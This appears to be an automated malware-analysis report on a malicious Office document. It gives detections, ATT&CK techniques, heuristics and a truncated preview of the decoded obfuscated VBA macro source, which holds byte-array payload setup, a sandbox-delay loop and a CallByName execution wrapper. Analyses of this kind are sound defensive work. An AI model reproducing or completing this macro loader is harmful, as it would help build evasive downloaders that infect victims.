MALICIOUS
Risk Score: 162
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a Microsoft Office document containing obfuscated VBA macros, as indicated by multiple heuristic firings including ClamAV's detection of macro obfuscation. The presence of `GetObject` and `CallByName` calls suggests dynamic execution of code. While the exact payload is not discernible due to obfuscation, the typical behavior for such documents is to download and execute a second-stage payload, hence the classification as a potential downloader.
Heuristics (5)
- ClamAV: Doc.Macro.Obfuscation-6663668-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.Obfuscation-6663668-0
- VBA macros detected (medium, 2 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- CallByName call (high, OLE_VBA_CALLBYNAME): CallByName call
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18328 bytes |

SHA-256: e944f496728f426377211e3db20697013d2ee6897b00feda21641700f6343572
Preview script: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim Xt5, Xt79(2) As Byte, Xt63(9) As Byte, Xt56(32) As Byte, Xt84(19) As Byte, Xt3(13) As Byte, Xt01(5) As Byte, Xt48(55) As Byte, Xt55(770) As Byte, Xt88(5) As Byte
Private Sub f_Layout()
    If Xt5 = 0 Then
        Xt5 = 59
        Dim Xt06, Xt59
        Xt59 = 36764888
        While Xt06 <= Xt59
            Xt06 = Xt06 + 1
        Wend
        If Xt06 - 1 = Xt59 Then
            Xt24
        End If
    End If
End Sub
Private Sub Xt87()
    Xt84(19) = 203
    Xt84(11) = 100
    Xt84(9) = 210
    Xt84(2) = 178
    Xt84(17) = 213
    Xt84(16) = 39
    Xt84(5) = 102
    Xt84(6) = 192
    Xt84(15) = 171
    Xt84(18) = 11
    Xt84(10) = 6
    Xt84(14) = 102
    Xt84(4) = 127
    Xt84(7) = 15
    Xt84(12) = 180
    Xt84(3) = 232
    Xt84(1) = 154
    Xt84(0) = 24
    Xt84(13) = 42
    Xt84(8) = 216
End Sub
Private Function Xt7(Xt37, Xt95, Xt1, Xt9, Xt93, Xt16)
    On Error GoTo Xt4
    If Xt9 = 1 Then
        CallByName Xt37, Xt95, Xt1, Xt93, Null, Xt16
    Else
        Set Xt7 = CallByName(Xt37, Xt95, Xt1, Xt93)
    End If
    Exit Function
Xt4:
End Function
Private Sub Xt90()
    Xt63(9) = 198
    Xt63(0) = 28
    Xt63(4) = 26
    Xt63(7) = 25
    Xt63(1) = 155
    Xt63(8) = 216
    Xt63(6) = 254
    Xt63(3) = 172
    Xt63(5) = 80
    Xt63(2) = 179
End Sub
Private Sub Xt83()
    Xt56(11) = 120
    Xt56(16) = 56
    Xt56(12) = 179
    Xt56(9) = 195
    Xt56(23) = 132
    Xt56(25) = 69
    Xt56(28) = 140
    Xt56(8) = 141
    Xt56(7) = 14
    Xt56(19) = 129
    Xt56(18) = 76
    Xt56(17) = 215
    Xt56(0) = 56
    Xt56(6) = 228
    Xt56(27) = 66
    Xt56(2) = 178
    Xt56(10) = 12
    Xt56(14) = 113
    Xt56(30) = 200
    Xt56(32) = 36
    Xt56(1) = 154
    Xt56(31) = 87
    Xt56(15) = 163
    Xt56(29) = 84
    Xt56(4) = 42
    Xt56(21) = 198
    Xt56(20) = 253
    Xt56(22) = 206
    Xt56(13) = 37
    Xt56(3) = 182
    Xt56(5) = 84
    Xt56(26) = 6
    Xt56(24) = 55
End Sub
Private Sub Xt43()
    Xt55(332) = 22
    Xt55(725) = 206
    Xt55(551) = 153
    Xt55(739) = 68
    Xt55(494) = 145
    Xt55(591) = 56
    Xt55(423) = 157
    Xt55(768) = 101
    Xt55(682) = 85
    Xt55(46) = 63
    Xt55(43) = 182
```
... (truncated)